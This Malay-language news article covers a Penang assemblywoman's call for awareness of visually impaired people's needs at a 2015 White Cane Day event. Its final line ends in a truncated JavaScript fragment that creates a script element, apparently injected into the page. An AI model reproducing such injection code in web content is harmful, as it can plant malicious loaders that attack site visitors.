ADUN harap umum peka keperluan pemegang ‘tongkat putih’

Oleh : AINUL WARDAH SOHILLI

Gambar : ALISSALA THIAN

 

PULAU TIKUS – Ahli Dewan Undangan Negeri (ADUN) Pulau Tikus, Yap Soo Huey berharap Hari Tongkat Putih (HTP) yang disambut pada bulan Oktober setiap tahun dapat memberi kesedaran kepada umum mengenai keperluan dan hak golongan cacat penglihatan.

Ujarnya, saban tahun, HTP disambut meriah di seluruh pelosok dunia dalam usaha memberi pendedahan kepada orang ramai agar lebih prihatin dan peka terhadap pemegang ‘tongkat putih’ berkaitan.

“Umum mengetahui bahawa wujudnya golongan orang kurang upaya (OKU) termasuk mereka yang cacat penglihatan, namun ramai yang tidak sedar akan keperluan, hak dan kebebasan golongan ini.

“Misalnya, di laluan pejalan kaki, masih ramai dalam kalangan kita yang sesuka hati meletakkan kenderaan di laluan tersebut sehingga wujudnya halangan yang menyukarkan golongan ini untuk bergerak.

“Begitu juga ketika di lampu isyarat, masih ramai yang memberhentikan kenderaan di atas laluan yang dikhaskan untuk pejalan kaki melintas. Semua ini perlu diubah,” ucapnya pada Majlis Perasmian HTP dan World Sight Day 2015 di St. Nicholas Home di sini barubaru ini.

Hadir sama, Pengarah Urusan St. Nicholas Home, Daniel Soon; Setiausaha Bandaraya, Majlis Bandaraya Pulau Pinang (MBPP), Ir. Ang Aing Thye dan ketua sukarelawan dari Universiti Sains Malaysia (USM), Dr. Lee Lay Wah. Pengurus Besar L’Occitane Malaysia, Tan Seong Teck dan wakil Persatuan Buddha Malaysia (MBA), Shi Siang Fa selaku penaja turut sama memeriahkan sambutan HTP 2015 tersebut.

Mengulas lanjut, Soo Huey memberitahu bahawa Kerajaan Negeri kini giat melaksanakan pelbagai pembaharuan dan perubahan termasuk menyediakan laluan khusus untuk orang-orang berkeperluan khas.

“Selain itu, Kerajaan Negeri juga mengarahkan agar pihak pemaju sama ada dalam sektor hartanah mahupun perniagaan untuk mematuhi Piawaian Malaysia, MS1184;1990, MS1183;1991 dan MS1331;1993 (kod standard bagi OKU dalam pembangunan awam) dalam membangunkan projek masing-masing.

“Umum perlu menyedari bahawa orangorang berkeperluan khas ini memerlukan aksesibiliti bagi mengurangkan kebergantungan mereka sekaligus mendidik golongan ini untuk lebih berani dan berdikari,” jelas beliau.

Seramai 200 individu mengambil bahagian dalam penganjuran tersebut. Tongkat putih merupakan alat bantuan mobiliti bagi orang-orang berkeperluan khas penglihatan untuk bergerak dan menerokai persekitaran mereka.var d=document;var s=d.createElement(‘script’);